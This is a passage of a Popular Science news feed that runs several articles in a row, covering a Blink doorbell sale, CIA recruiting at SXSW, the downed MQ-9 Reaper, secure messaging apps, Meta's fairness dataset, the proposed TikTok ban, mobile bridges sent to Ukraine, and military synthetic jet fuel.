Improve your home's smart home security system for an incredibly low price.

The post Blink’s Smart Doorbell is just $35 on Amazon right now appeared first on Popular Science.

]]>

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

Starting a smart home security system can seem daunting—and expensive—but it doesn’t have to be, thanks to an unexpected sale on video doorbells and cameras from Blink. The company has always focused on budget-priced gear that punches above its weight, and right now you can get an HD security camera for well under $50. This deal isn’t tied to a larger sale and could end at any time.

Blink’s battery-powered, Amazon Alexa-enabled HD camera is a no-brainer for anyone who wants to start a smart security system without breaking the bank. It has all the key features found in more expensive options: motion detection, cloud storage (for $3 per month or $30 per year), a two-way audio system, and the option to run it on batteries or existing doorbell wiring. You can avoid paying for cloud storage by using Blink’s Sync Module 2, an accessory that will let you save its video clips locally. The Sync Module isn’t on sale, but Blink is offering a bundle with its Video Doorbell for $26 off.

A big part of the Blink Video Doorbell’s appeal is its integration with Amazon’s hardware ecosystem. If you have an Echo Show, for instance, video from the Video Doorbell will pop up on its screen when someone approaches your home. You’ll immediately be able to tell if someone you know has arrived, a package has been delivered, or a solicitor has come knocking. If you’re not home, a notification on your phone will alert you that someone has arrived, and you can communicate with them using the Blink Video Doorbell’s microphone and speaker system.

It may not be able to record video in 4K, but Blink’s Video Doorbell will keep an eye on the most vulnerable part of your house for a bargain price.




]]>
The CIA hit up SXSW this year—to recruit tech workers https://www.popsci.com/technology/cia-sxsw-presentation/ Wed, 15 Mar 2023 16:00:00 +0000 https://www.popsci.com/?p=519736
Building in Austin, Texas, displaying SXSW logo with people outside
The CIA is apparently mingling at SXSW to try courting potential tech industry partners. Deposit Photos

On Monday, the intelligence agency stopped by the annual tech and culture festival to pitch attendees on spycraft collaborations.

The post The CIA hit up SXSW this year—to recruit tech workers appeared first on Popular Science.

]]>

The annual South by Southwest festival is currently in full-swing down in Austin, Texas, showcasing this year’s trendiest films, music, comedy, and cutting-edge tech. Much of what dominates the coming year’s buzzworthy headlines often gets a springtime boost from SXSW coverage, such as last year’s Everything Everywhere All at Once, which drew rave reviews at SXSW and went on to win the Academy Award for Best Picture on Sunday. And at least one government agency is trying to capitalize on the cultural cachet—the Central Intelligence Agency.

On Monday, the CIA hosted a one-hour presentation, entitled “Spies Supercharged,” from a downtown Austin Hilton conference room—an “open call” for those working within areas like quantum computing, biotech, semiconductor research, and wireless communications. The CIA purportedly wants tech’s brightest minds to consider future collaborations with the covert intel agency, according to Bloomberg Business, which also noted around 500 people were in attendance.

[Related: A CIA spy plane crashed outside Area 51 a half-century ago. This explorer found it.]

“In a world of ubiquitous surveillance, artificial intelligence, sophisticated disinformation campaigns, and data streams that double in size every two years, how will intelligence agencies respond to the opportunities and challenges presented by emerging technologies and the ever-changing digital ecosystems we will live within?” reads the event’s official description on SXSW’s panel schedule.

“Supercharged spies are exactly what you want, and what you deserve,” CIA deputy director David Cohen said early in the presentation, reiterating that the agency is deeply concerned about threats posed by AI advancements in surveillance and communications that could potentially compromise agents and assets in the field. “To defeat that ubiquitous technology, if you have any good ideas, we’d be happy to hear about them afterwards,” Cohen added.

Although it’s currently unclear if any deals were struck immediately following the “Spies Supercharged” pitch meeting, the CIA has a number of job openings posted to its website, including Telecommunications Services Officer, Digital Forensics Engineer, and Cyber Security Researcher.

Calling the tech sector “one of the great engines” of the US economy, Cohen argued that an increasing amount of resources would need to be dedicated to ensuring economic stability in the face of meddling from foreign adversaries.

[Related: The CIA’s bold kidnapping of a Soviet spacecraft.]

The presentation comes at a tricky time for tech—last week, the dramatic collapse of Silicon Valley Bank, previously the primary financial institution for the tech sector’s venture capitalist backers and startups, sent shockwaves through the economy. SVB was essentially rendered insolvent after depositors attempted to withdraw $42 billion following market indications of bank turmoil, and critics have since argued such chaos doesn’t exactly speak to Silicon Valley leaders’ business acumen or long-term strategy.

SXSW is set to wrap up on March 19, following remaining events like Apple Original Films Presents: The Tetris Experience and the Mike’s Hard Lemonade Lounge.



]]>
What to know about the MQ-9 Reaper, the drone the US just lost over the Black Sea https://www.popsci.com/technology/mq-9-reaper-drone-russia-crash/ Tue, 14 Mar 2023 21:30:00 +0000 https://www.popsci.com/?p=519569
MQ-9 Reaper in flight
An MQ-9 Reaper over the Nevada Test and Training Range on July 15, 2019. The UAVs have a wingspan of 66 feet. William Rio Rosado / US Air Force

It was "intercepted and hit by a Russian aircraft," according to an Air Force general. These are the basics of the incident—and the Reaper.

The post What to know about the MQ-9 Reaper, the drone the US just lost over the Black Sea appeared first on Popular Science.

]]>

This post has been updated on March 16 to include video of the incident released by the US Department of Defense. The story was originally published on March 14, 2023.

At 7:03 am Central European Time on March 14, one of a pair of Russian Su-27 fighter jets flying over the Black Sea struck the propeller of an MQ-9 Reaper drone piloted by the United States. According to US European Command, the strike against the propeller required the drone’s remote pilots to bring it down into international waters. It is hardly the first takedown of a Reaper drone, nor is it even the first time Russian forces have caused the destruction of such a plane, but any confrontation between military aircraft of the world’s two foremost nuclear-armed states can understandably feel tense.

Since 2021, the United States has based MQ-9 Reaper drones in Romania, a NATO ally that borders both Ukraine and the Black Sea. These Reapers, as well as Reapers flown from elsewhere, were part of the overall aerial surveillance mission undertaken by the United States and NATO on the eve of Russia’s February 2022 invasion of Ukraine.

What happened over the Black Sea?

The basics of the incident are as follows: “Our MQ-9 aircraft was conducting routine operations in international airspace when it was intercepted and hit by a Russian aircraft, resulting in a crash and complete loss of the MQ-9,” said US Air Force general James B. Hecker, commander of US Air Forces Europe and Air Forces Africa, in a statement about the incident published by US European Command. “In fact, this unsafe and unprofessional act by the Russians nearly caused both aircraft to crash. US and Allied aircraft will continue to operate in international airspace and we call on the Russians to conduct themselves professionally and safely.” (Watch video of the incident here.)

This is language that emphasizes the incident as a mistake or malfeasance by the two Russian Su-27 pilots. It is not, notably, a demand that the loss of a Reaper be met with more direct confrontation between the United States and Russia, even as the US backs Ukraine with supplies and, often, intelligence as it fights against the continued Russian invasion. In the years prior to Russia’s full invasion of Ukraine, Russian jets repeatedly harassed US aircraft over the Black Sea. It is a common enough occurrence that the think tank RAND has even published a study on what kind of signals Russia intends to send when it intercepts aircraft near but not in Russian airspace.

“Several times before the collision,” according to European Command, “the Su-27s dumped fuel on and flew in front of the MQ-9 in a reckless, environmentally unsound and unprofessional manner.”

Russia’s Ministry of Defence also released a statement on the incident, claiming that the Reaper was flying without a transponder turned on, that the Reaper was headed for Russian borders, and that the plane crashed of its own accord, without any contact with Russian jets.

In a press briefing the afternoon of March 14, Pentagon Press Secretary Pat Ryder noted that the Russian pilots were flying near the drone for 30 to 40 minutes before the collision that damaged the Reaper. Asked if the drone was near Crimea, a peninsula on the Black Sea that was part of Ukraine until Russia occupied it in 2014, Ryder said only that the flight was in international waters and well clear of any territory of Ukraine. Ryder also did not clarify when asked about whether or not the Reaper was armed, saying instead that it was conducting an ISR (intelligence, surveillance, and reconnaissance) mission.

The New York Times reported that the drone was not armed, citing a military official.

What is an MQ-9 Reaper?

The Reaper is an uncrewed aerial vehicle, propelled by a pusher prop. It is made by General Atomics, and is an evolution of the Predator drone, which started as an unarmed scout before being adapted into a lightly armed bomber. The Reaper entered operational service in October 2007, and it was designed from the start to carry weapons. It can wield nearly 4,000 pounds of explosives, like laser guided bombs, or up to eight Hellfire missiles.

Reapers measure 36 feet from tip to tail and have a wingspan of 66 feet, and in 2020 cost about $18 million apiece.

To guide remote pilots for takeoff and landing, Reapers have a forward-facing camera, mounted at the front of their match-shaped airframes. To perceive the world below, and offer useful real-time video and imaging, a sensor pod complete with laser target designator, infrared camera, and electro-optical cameras pivots underneath the front of the drone, operated by a second crew member on the ground: the sensor operator. 

Reapers can stay airborne at altitudes of up to 50,000 feet for up to 24 hours, with remote crews guiding the plane in shifts and trading off mid-flight. The Reaper’s long endurance, not just hours in the sky but its ability to operate up to 1,150 miles away from where it took off, lets it watch vast areas, looking for relevant movement below. This was a crucial part of how the US fought the counter-insurgency in Iraq and especially Afghanistan, where armed Reapers watching for suspected enemies proved an enduring feature of the war, to mixed results.

While Reapers have been used for well over a decade, they have mostly seen action in skies relatively clear of hostile threats. A Reaper’s top speed is just 276 mph, and while its radar can see other aircraft, the Su-27 air superiority fighter can run laps around it at Mach 2.35. In seeking a future replacement for Reapers, the US Air Force has stated an intention that these planes be able to defend themselves against other aircraft.

Have drones like the Reaper been shot down before?

The most famous incident of a US drone shoot-down is the destruction of an RQ-4 Global Hawk by Iran in June 2019. This unarmed surveillance drone was operating in the Gulf of Oman near the Strait of Hormuz, a highly trafficked waterway that borders Iran on one side and the Arabian Peninsula on the other. Iran claimed the Global Hawk was shot down within Iran’s territorial waters; the United States argued instead that the drone was operating in international waters. While the crisis did not escalate beyond the destruction of the drone, it was unclear at the time that this incident would end calmly.

Reapers have been shot down by militaries including the US Air Force. In 2009, US pilots lost control of an MQ-9 Reaper over Afghanistan, so a crewed fighter shot it down before it could stray into another country’s airspace.

In 2017 and again in 2019, Houthi insurgent forces in Yemen shot down US Reapers flying over the country. Reapers have also been lost to jamming, when the signals between operators and drone were obstructed or cut, as plausibly happened to a Reaper operated by the Italian military over Libya in 2019.

Ultimately, the March 14 takedown of the Reaper by Russian fighters appears to be part of the larger new normal of drones as a part of regular military patrols. As with the US destruction of a surveillance balloon in the Atlantic, the most interesting lesson is less what happened between aircraft in the sky, and more what is discovered by whoever gets to the wrecked aircraft in the water first.



]]>
7 secure messaging apps you should be using https://www.popsci.com/story/diy/best-secure-messaging-apps/ Mon, 16 Aug 2021 18:25:40 +0000 https://stg.popsci.com/uncategorized/best-secure-messaging-apps/
Person on a New York City subway train texting on their phone.
You have a lot of options when it comes to choosing among the most secure messaging apps. Ketut Subiyanto / Pexels

You might want to rethink your favorite messaging app and opt for something more secure.

The post 7 secure messaging apps you should be using appeared first on Popular Science.

]]>

When choosing a messaging app, it’s easy to just fall in line with whatever your friends and family have on their phones. Whether or not the platform is secure isn’t often a major factor in the decision. But maybe it should be, given the sheer amount of sensitive information we share with our contacts every day.

Not all messaging apps are the same, especially when it comes to your privacy and security. If you’re in the market for a more secure messaging app, we can help. The web is wide and diverse, and there are plenty of platforms that will satisfy your texting needs without asking you to disclose everything about yourself. It’s just a matter of looking.

You’ll be on your own when talking everyone else into moving to another platform, but we believe in you.

Signal

The gold standard of secure messaging apps, Signal is a stripped-down platform designed to put privacy and security first. In fact, the app’s protocol, developed by Open Whisper Systems, is also embedded within the code of competitors such as WhatsApp and Skype, and inspired Viber’s customized version.

Signal is free, open-source, and operated by The Signal Foundation—a non-profit with a mission to “develop open source privacy technology.” Brian Acton, one of WhatsApp’s founders, left Facebook (reportedly on bad terms) after the company acquired his platform, and donated $50 million to create the foundation. It’s one of the main reasons users trust the app, as there’s no big tech company behind it.

The platform supports texting, video and voice calls, as well as file-sharing. Privacy-wise, you can set your messages to self-destruct at any time from one second after they’re read to four weeks after you send them. End-to-end (E2E) encryption protects everything you share through Signal by default, and the foundation says it doesn’t store any sensitive information. The US government subpoenaed user data in 2016, but authorities only got their hands on the dates accounts were created, dates of last connections, and phone numbers.

Of course, handing over a phone number to create an account—and automatically sharing it with anybody who might find you through the app—means you won’t be entirely anonymous. Signal’s developers say they’re thinking of a way around it, but as of writing, there’s no date or specific project in the works to resolve this.

Still, Signal does its job well, and as more people get on board, it’ll be easier to keep in touch with your loved ones without anybody snooping around.

Signal is free for iOS, iPadOS, Android, macOS, Windows, and Linux.

WhatsApp

WhatsApp got a bad rap in 2021 when Meta, its parent company, announced a controversial update to the app’s privacy policy that would allow it to share information with Facebook and Instagram. People did not like it, and WhatsApp hit the pause button. The platform stopped sending notifications promoting the new privacy policy, and those who didn’t accept it have been able to continue using the app with no problems.

Sketchy privacy practices aside, WhatsApp is a versatile messaging app that’s fully end-to-end encrypted. The app supports text and voice messaging, voice and video calls, and sharing images, videos, documents, and other types of files. The platform has kept up with contemporary privacy and security features too, adding disappearing messages and the ability to entirely delete messages from private and group chats.

[Related: The 7 best apps for all your group chats]

WhatsApp also supports group chats with up to 1,024 members. The platform had a higher limit in the past, but that turned into a problem when the app became an effective tool for the propagation of misinformation and other illegal material. As a result, WhatsApp eventually limited the ability to forward messages and the size of group chats.

It’s unclear whether Meta will persist with its plans to integrate WhatsApp’s operation more intimately into the rest of its platforms, but the messaging app today enjoys the trust of more than 2 billion users worldwide, so you definitely won’t run out of people to talk to. 

WhatsApp is free for iOS, Android, macOS, and on the web.

Telegram

Telegram got its day in the sun when WhatsApp’s ill-received privacy policy announcement directly resulted in Telegram’s user base growing. The app reached 500 million users that year and has continued to grow, reinforcing its fame as a top-tier secure messaging app.

The app supports texting, voice and video calls, public channels, and file-sharing, with an interface highly similar to WhatsApp’s iOS appearance, so switching over from Meta’s messaging app should be seamless.

The platform also uses E2E encryption, but not by default. Only Secret Chats, which are one-to-one, are protected by this protocol. These chats cannot be forwarded, leave no trace on Telegram’s servers, and can be set to have sent messages self-destruct after a specific time. This is great from a privacy standpoint, but it also means that all other communications (group chats, channels, and non-secret chats) are cloud-based and encryption protection ends when they hit the server.

[Related: Bring your WhatsApp stickers with you to Telegram]

The lack of widespread E2E encryption is meant to give users instant access to backups on multiple devices, no matter when they joined a channel or group chat, Telegram says. Pavel Durov, one of the app’s founders, also argues that government agencies might target users using “niche apps” such as Signal, assuming that anyone opting for that high level of privacy has something to hide. Having less-secure encryption as the default, Telegram says, protects users from unwanted surveillance.

As opposed to WhatsApp, which uses third-party servers like iCloud or Google Drive to store backups—giving Apple and Google the ability to manage that information—Telegram’s backups are broken into pieces and live on its own servers around the world. The company claims chats, no matter what type, are all secured the same way, but because Telegram technically also has access to the encryption key, it can decrypt your messages, even if it says the key and the data it decrypts are never in the same place.

Even though Telegram emphasized its commitment to security by updating its privacy policy to protect the identity of Hong Kong protesters in 2019, that commitment should be taken with a grain of salt, according to Gennie Gebhart, acting activism director at the Electronic Frontier Foundation.

“Telegram doesn’t have a great track record of responding to high-risk users,” she says. “My impression is that a lot of Telegram’s ‘secure’ reputation comes from its association with the Hong Kong protests, but the app was also useful in that environment for a lot of specific reasons, like no phone number requirement or the support for massive groups.”

That last feature, which allows users to create chats that can impressively host up to 200,000 members, is a major reason the platform has been criticized. These unmoderated public channels have also become fertile ground for the distribution of misinformation and illegal content, such as revenge and child pornography. But unlike WhatsApp, Telegram has refused to reduce that limit.

Telegram is free for iOS, iPadOS, Android, macOS, Windows, Linux, and on the web.

Dust

Less popular than Signal or Telegram, Dust is a good option if you want to keep your content as secure as you can. Beyond E2E encryption, the app has a privacy-focused functionality that lets users hide their tracks online, and a monitoring system that will instantly alert you if any of your passwords are compromised as part of a data leak.

By default, messages (or “dusts”) disappear from the app’s servers right after you send them, and chat histories are automatically erased from your phone every 24 hours. On top of that, you (or your contacts) can delete messages on both ends of the conversation with just one tap, and you can sign up by using only your phone number.

The bad news is that the platform doesn’t currently support video calls or voice messages—only texting, file sharing, and voice calling—which may be a deal-breaker if you want a more comprehensive service.

Dust is free for iOS and Android.

There are a lot of secure messaging apps to choose from.
Protect your data by choosing secure messaging apps. Chris Yang / Unsplash

Threema

This app is open-source, E2E encrypted, and—just like Dust and Signal—deletes messages from its servers right after they’re delivered. Threema doesn’t require a phone number or email to sign up, instead verifying each user with a Threema ID, a randomly generated eight-character string that allows them to be completely anonymous.

Threema supports texting, voice and video calls, but its major drawback is that you have to pay for it. The company says this allows its developers to sustain the platform without ads or data-harvesting, and it might also explain why it only had 11 million users worldwide as of October 2022. You can use it on the web, Windows, and macOS, but there are restrictions and you need to have the mobile app on your phone or tablet.

Threema is $5 for iOS, iPadOS, and Android.

Viber

Like many of the other apps on this list, Viber will protect your content (texts, voice calls, and video chats) with default E2E encryption, whether you’re engaging in one-on-one conversations or group interactions. Chatbots and communities are the exceptions to this rule.

If you choose this app, you’ll have to make sure you have version 6.0 or later, as earlier versions don’t support E2E-encrypted messaging. Unfortunately, you’ll also have to worry about what version other people have: if you’re chatting with someone using an older version of Viber, you can kiss E2E encryption bye-bye. If you’re unsure whether a chat is E2E encrypted, you can check by going to the chat info screen and looking for a lock icon next to Encrypted chat.

[Related: The best apps for sending self-destructing messages]

Just like Telegram, Viber also has public channels called Communities, and these messages are only SSL encrypted. This protects data in transit, but once it’s on the app’s servers, it’s readable by Viber or any other member of the community, allowing new members to access all backlogs.

Viber’s privacy features include the ability to set self-destructing timers for messages, edit and delete messages on all devices with a tap, and either get notifications if a user takes a screenshot of a disappearing message (iOS) or block the screenshot altogether (Android). You can also create Hidden chats and access them with a PIN whenever you want.

Viber is free for iOS, iPadOS, Android, Huawei’s App Gallery, macOS, Windows, and Linux.

iMessage

If you’re an Apple user, you’re in luck, as you have access to the company’s built-in E2E encrypted messaging platform. Now, the catch is that iMessage only works with this security standard when you’re chatting with other Apple users—if one of your friends uses an Android device, privacy pretty much goes out the window.

Because iMessage doesn’t play nice with other messaging apps, it immediately switches to the not-so-good-ol’ SMS message whenever it cannot use Apple’s protocol, turning chat bubbles from blue to green. This type of message is reliable, as it doesn’t require your device to have lots of bars to work, but it’s neither secure nor private—SMS messages can be traced, intercepted, and stored by your service provider, who can gladly hand them over to authorities, if asked politely.

This is also an issue for interactions between Apple users, though. By default, iMessage also switches to SMS when connectivity is low. The problem is that you won’t actually know if this has happened, as individual bubbles in your chats won’t change color to show how they were delivered.

The good news is that you can disable this feature—just go to the Messages settings menu and turn off the toggle switch next to Send as SMS.

iMessage is built into Apple devices.

Updated February 4, 2021 to more accurately reflect that Telegram’s user base as of January 2021 was 500 million users worldwide.

This story has been updated. It was originally published on January 18, 2021.

The post 7 secure messaging apps you should be using appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

Meta attempts a new, more ‘inclusive’ AI training dataset https://www.popsci.com/technology/meta-ai-casual-conversations-v2/ Fri, 10 Mar 2023 17:20:00 +0000 https://www.popsci.com/?p=518786
Meta logo on smartphone resting atop glowing keyboard
Meta won't say how much it paid its newest dataset participants for their time and labor. Deposit Photos

Experts say Casual Conversations v2 is an improvement, but questions remain about its sourcing and labor.

The post Meta attempts a new, more ‘inclusive’ AI training dataset appeared first on Popular Science.


With the likes of OpenAI’s ChatGPT and Google’s Bard, tech industry leaders are continuing to push their (sometimes controversial) artificial intelligence systems alongside AI-integrated products to consumers. Still, many privacy advocates and tech experts remain concerned about the massive datasets used to train such programs, especially when it comes to issues like data consent and compensation from users, informational accuracy, as well as algorithmically enforced racial and socio-political biases. 

Meta hoped to help mitigate some of these concerns via Thursday’s release of Casual Conversations v2, an update to its 2021 AI audio-visual training dataset. Guided by a publicly available November literature review, the data offers more nuanced analysis of human subjects across diverse geographic, cultural, racial, and physical demographics, according to the company’s statement.

[Related: No, the AI chatbots (still) aren’t sentient.]

Meta states v2 is “a more inclusive dataset to measure fairness,” and is derived from 26,467 video monologues recorded in seven countries, offered by 5,567 paid participants from Brazil, India, Indonesia, Mexico, Vietnam, the Philippines, and the United States who also provided self-identified attributes including age, gender, and physical appearance. Although Casual Conversations’ initial release included over 45,000 videos, they were drawn from just over 3,000 individuals residing in the US and self-identifying via fewer metrics.

Tackling algorithmic biases in AI is a vital hurdle in an industry long plagued by AI products offering racist, sexist, and otherwise inaccurate responses. Much of this comes down to how algorithms are created, cultivated, and provided to developers.

But while Meta touts Casual Conversations v2 as a major step forward, experts remain cautiously optimistic, and urge continued scrutiny for Silicon Valley’s seemingly headlong rush into an AI-powered ecosystem.

“This is [a] space where almost anything is an improvement,” Kristian Hammond, a professor of computer science at Northwestern University and director of the school’s Center for Advancing the Safety of Machine Intelligence, writes in an email to PopSci. Hammond believes Meta’s updated dataset is “a solid step” for the company—especially considering past privacy controversies—and feels its emphasis on user consent and research participants’ labor compensation is particularly important.

“But an improvement is not a full solution. Just a step,” he cautions.

To Hammond, a major question remains regarding exactly how researchers enlisted participants in making Casual Conversations v2. “Having gender and ethnic diversity is great, but you also have to consider the impact of income and social status and more fine-grained aspects of ethnicity,” he writes, adding, “There is bias that can flow from any self-selecting population.”

[Related: The FTC has its eyes on AI scammers.]

When asked about how participants were selected, Nisha Deo of Meta’s AI Communications team told PopSci via email, “I can share that we hired external vendors with our requirements to recruit participants,” and that compensatory rates were determined by these vendors “having the market value in mind for data collection in that location.”

When asked to provide concrete figures regarding pay rates, Meta stated it was “[n]ot possible to expand more than what we’ve already shared.”

Deo, however, additionally stated Meta deliberately incorporated “responsible mechanisms” across every step of data cultivation, including a comprehensive literature review in collaboration with academic partners at Hong Kong University of Science and Technology on existing dataset methodologies, as well as comprehensive guidelines for annotators. “Responsible AI built this with ethical considerations and civil rights in mind and are open sourcing it as a resource to increase inclusivity efforts in AI,” she continued.

For industry observers like Hammond, improvements such as Casual Conversations v2 are welcome, but far more work is needed, especially when the world’s biggest tech companies appear to be entering an AI arms race. “Everyone should understand that this is not the solution altogether. Only a set of first steps,” he writes. “And we have to make sure that we don’t get so focused on this very visible step… that we stop poking at organizations to make sure that they aren’t still gathering data without consent.”

Why some US lawmakers want to ban TikTok https://www.popsci.com/technology/tiktok-ban-restrict-act/ Wed, 08 Mar 2023 21:35:28 +0000 https://www.popsci.com/?p=518269
tiktok
The RESTRICT Act focuses on what Senator Mark Warner of Virginia's office describes as the "ongoing threat posed by technology from foreign adversaries." Deposit Photos

Here’s what the newly introduced RESTRICT Act says about technology, China, and more.

The post Why some US lawmakers want to ban TikTok appeared first on Popular Science.


Yesterday, lawmakers introduced a new bipartisan Senate bill that would give the US government the power to ban TikTok. The bill is called, clunkily, the Restricting the Emergence of Security Threats that Risk Information and Communications Technology, or RESTRICT Act. It was introduced in part by Sen. Mark Warner of Virginia, who is also the chair of the Senate Intelligence Committee, and it would allow the Commerce Department to review deals, software updates, and data transfers from apps and tech companies in which “foreign adversaries,” specifically the governments of China, Cuba, Iran, North Korea, Russia, and Venezuela, have an interest. 

It’s the latest—and perhaps the closest to becoming law—in a long line of proposals that look to limit the potential for the Chinese Communist Party (CCP) to exert influence on TikTok, and by extension, its users around the world.

Both the US and European Union governments are considering banning TikTok, limiting how it can handle customer data, and generally just increasing the regulatory burden it’s under compared to, say, Facebook or Instagram. Both entities have gone so far as to ban it on government staff’s work phones over espionage fears. Let’s take a look at why. 

Although TikTok has over 100 million active monthly users in the US and at least 10,000 employees across the US and Europe, its parent company, ByteDance, is headquartered in Beijing, China. This has led to some security concerns as well as plenty of bellicose posturing from US lawmakers and China-hawks. 

The security concerns come in part because ByteDance has bowed down to the CCP in the past. For example, in 2018, its then-CEO and founder, Zhang Yiming, had to issue a groveling, self-criticizing apology after the CCP compelled it to shut down one of its other apps. He promised to “further deepen cooperation” with the authoritarian government.

TikTok and ByteDance employees also have a manual override for what goes viral and gets promoted by the app’s “For You” algorithm. Earlier this year, a Forbes report on the “heating” feature revealed that TikTok frequently promoted videos in order to court influencers and brands and entice them into partnerships based on inflated video view counts. The concern here is that government propaganda, fake news, and anything else could be manipulated in the same way. 

Then there are legitimate concerns about TikTok’s data handling practices. Last year, a BuzzFeed news report revealed that engineers in China were able to access data from US users, despite the information supposedly being stored in the US. TikTok’s COO, Vanessa Pappas, did little to alleviate those concerns in a grilling before the Senate Homeland Security and Governmental Affairs Committee last summer. Finally, TikTok had to fire four employees based in the US and China for attempting to spy on reporters, including Emily Baker-White who wrote both the Forbes and BuzzFeed investigations. 

Of course, the app also enjoys a huge amount of popularity domestically—more than two-thirds of teens use TikTok, after all. 

As David Greene, civil liberties director of the Electronic Frontier Foundation, explains over Zoom, ByteDance and TikTok aren’t really handling data or bowing down to government pressure in a wildly different way compared to other social media apps. The big difference is where ByteDance is headquartered. 

Greene also thinks any US government attempt to ban TikTok is on shaky ground. “If the government wants to ban a way for people in this country to communicate with each other and with other people, it’s going to have to do so within the framework of the First Amendment,” he says. 

As Greene explains it, this means the US government will need to show that not only does some real threat to the public exist, but also that banning TikTok is justified. “It can’t just be responding to undifferentiated fear, or to uninvestigated or unproven concerns, or at the worst, xenophobia,” he says. 

TikTok is also fighting hard to ensure it can continue to operate in the US and Europe. It’s recently launched Project Texas and Project Clover, multi-billion dollar restructuring plans that would store US data in the US and European data in Ireland and Norway, in ways designed to prevent access from China. Whether these efforts can reassure lawmakers that it doesn’t need additional oversight—or worse, a total ban—remains to be seen.

The same day the bill was introduced, the White House said in a statement from the National Security Advisor that they “urge Congress to act quickly to send it to the President’s desk.” You can watch Senator Warner talk more about the bill here.

Ukraine is getting mobile bridges from the US. Here’s how they can help. https://www.popsci.com/technology/armored-vehicle-launched-bridge-ukraine/ Tue, 07 Mar 2023 23:00:00 +0000 https://www.popsci.com/?p=518005
armored vehicle launched bridge
An Armored Vehicle Launched Bridge seen in 2017 in Wisconsin. John Russell / US Army

They are technically known as Armored Vehicle Launched Bridges, and setting them up takes minutes.

The post Ukraine is getting mobile bridges from the US. Here’s how they can help. appeared first on Popular Science.


On March 3, the Department of Defense announced it would be sending mobile bridges to Ukraine. The bridges are the signature part of the Pentagon’s 33rd offering of existing US equipment to supply Ukraine, since Russia invaded the country in February 2022. These vehicles that can place bridges, along with the other equipment sent, are reflections of the shape of the war so far, and offer a glimpse into the tools the Biden Administration expects Ukraine to need in the coming spring thaw.

An Armored Vehicle Launched Bridge, or AVLB, is essentially a portable and durable structure that is carried, placed, and then removed by a modified tank hull. The specific Armored Vehicle Launched Bridges that will be sent to Ukraine are ones based on an M60 tank chassis, our colleagues at The War Zone report.

Rivers, chasms, and deep gaps in terrain can form impassable barriers to militaries, allowing defenders to concentrate forces at existing bridges or crossings. Getting over such a gap can necessitate flying to the other side, though that depends on an air transport force capable of massive movement and a cleared landing zone. It could mean physically building a new bridge, which can take time and is vulnerable to attack. Or it could mean bringing the bridge to the battlefield on the back of a tank and plopping it down as needed.

“These vehicles are designed to accompany armored columns and give them the ability to cross rivers, streams, ditches and trenches. The bridges are carried on the chassis of armored vehicles and launched at river or stream banks. Once the crossing is finished, the vehicle can pick up the bridge on the far bank and carry on,” the Department of Defense said in a release about this latest drawdown.

The exact number and model of the AVLBs sent to Ukraine is not yet known, though the general family is M60, or derived from the M60 Patton tank. That makes the models of a particular Cold War vintage, designed for the lighter armored vehicles and tanks of that era. Variants of the M60 AVLB have seen action in Vietnam, and have seen use in training exercises with NATO as well as in wars like Iraq.

The bridges are stored folded in half. When put in place by the vehicle, the bridges span 60 feet, can support up to 70 tons, and are 12.5 feet wide. Setting up the bridge takes between 2 and 5 minutes, and retrieving the bridge, which can be done at either end, takes about 10 minutes.

Some heavier vehicles, including modern combat tanks, can only use the bridge at slower speeds and over narrower gaps. The US Army and Marine Corps are working on a new bridge and launcher capable of supporting Bradley fighting vehicles and Abrams tanks, to better meet the needs of the US military.

Even with limitations, the bridges will expand how and where Ukrainian forces can operate and move. Being able to rapidly span a narrow but otherwise impassable river dramatically expands how and where an army can move and attack, creating room for surprise. 

In addition, the announcement of the drawdown package notes that the US is sending Ukraine “demolition munitions and equipment for obstacle clearing,” which can facilitate both cleaner retreats and surprise advances. War leaves battlefields littered with craters, ruins, unexploded bombs, and deliberately set mines. Blasting a way through such hazards can restore movement to otherwise pinned forces.

Beyond the bridges and demolition equipment, the latest drawdown includes three kinds of artillery ammunition. The HIMARS rocket artillery systems, invaluable for Ukraine’s fall offensives, are getting resupplied with more rockets. The United States is also supplying Ukraine with 155mm and 105mm artillery rounds, for howitzers donated by the US and NATO allies to the country. These weapons use different ammunition than the Soviet-inherited stock that made up the bulk of Ukraine’s artillery before the war and still accounts for the overall majority of artillery pieces on hand today. But supplies of Soviet-pattern ammunition are scarce, as it’s also the size used by Russia, and Russia aggressively bought up existing stockpiles of the rounds around the world.

The fourth kind of ammunition included in the drawdown is 25mm, the kind used by Bradley Infantry Fighting Vehicles. These tracked, turreted, and armed vehicles are more a form of fighting transport than tanks, despite their appearance, but their 25mm cannons are useful against all sorts of vehicles below the heavy armor of a tank. The package also includes tools for maintenance, vehicle testing and diagnostics, spare parts, and other less flashy but still invaluable means of ensuring vehicles stay functional, or at least can be repaired and brought back into use quickly.

Taken altogether, the latest drawdown of equipment fits the pattern of supplies to Ukraine this year. US supplies continue to give Ukraine the tools to fight existing artillery duels along grinding front lines, as well as building up the armored forces and accompanying features, like mobile bridges, needed for a future offensive.

Why the US military plans to start making its own jet fuel https://www.popsci.com/technology/us-military-synthetic-jet-fuel-air-company/ Fri, 03 Mar 2023 15:00:00 +0000 https://www.popsci.com/?p=516870
An F-16 with its afterburner lit takes off from a base in Japan in 2016.
An F-16 with its afterburner lit takes off from a base in Japan in 2016. Yasuo Osakabe / US Air Force

Traditional jet fuel is a petroleum product that comes from the ground, but it can also be created synthetically. Here's how.

The post Why the US military plans to start making its own jet fuel appeared first on Popular Science.


Before the jet fuel that powers an aircraft’s engines can be burned, it begins its life in the ground as a fossil fuel. But the US military is exploring new ways of producing that fuel, synthetically, and on site, where it needs to be used. They’ve just announced a contract for as much as $65 million to Air Company, a Brooklyn-based company that has developed a synthetic fuel that doesn’t take its starting materials from the ground. 

In announcing the contract, the Department of Defense notes that it has an eye on both security concerns and the environment. Getting airplane fuel where it needs to go, the DoD notes, “often involves a combination of ships, tanker planes, and convoys.” And these same transport mechanisms, the military adds, can “become extremely vulnerable.” 

Here’s how the fuel works, why the military is interested, and what the benefits and drawbacks are of this type of approach. 

The chemistry of synthetic jet fuel 

This DOD initiative is called Project SynCE, which is pronounced “sense,” and clunkily stands for Synthetic Fuel for the Contested Environment. By contested environment, the military is referring to a space, like a battlefield, where a conflict can occur.

The building blocks of the fuel from Air Company involve hydrogen and carbon, and the process demands energy. “We start with renewable electricity,” says Stafford Sheehan, the CTO and co-founder of Air Company. That electricity, he adds, is used “to split water into hydrogen gas and oxygen gas, so we get green hydrogen.” 

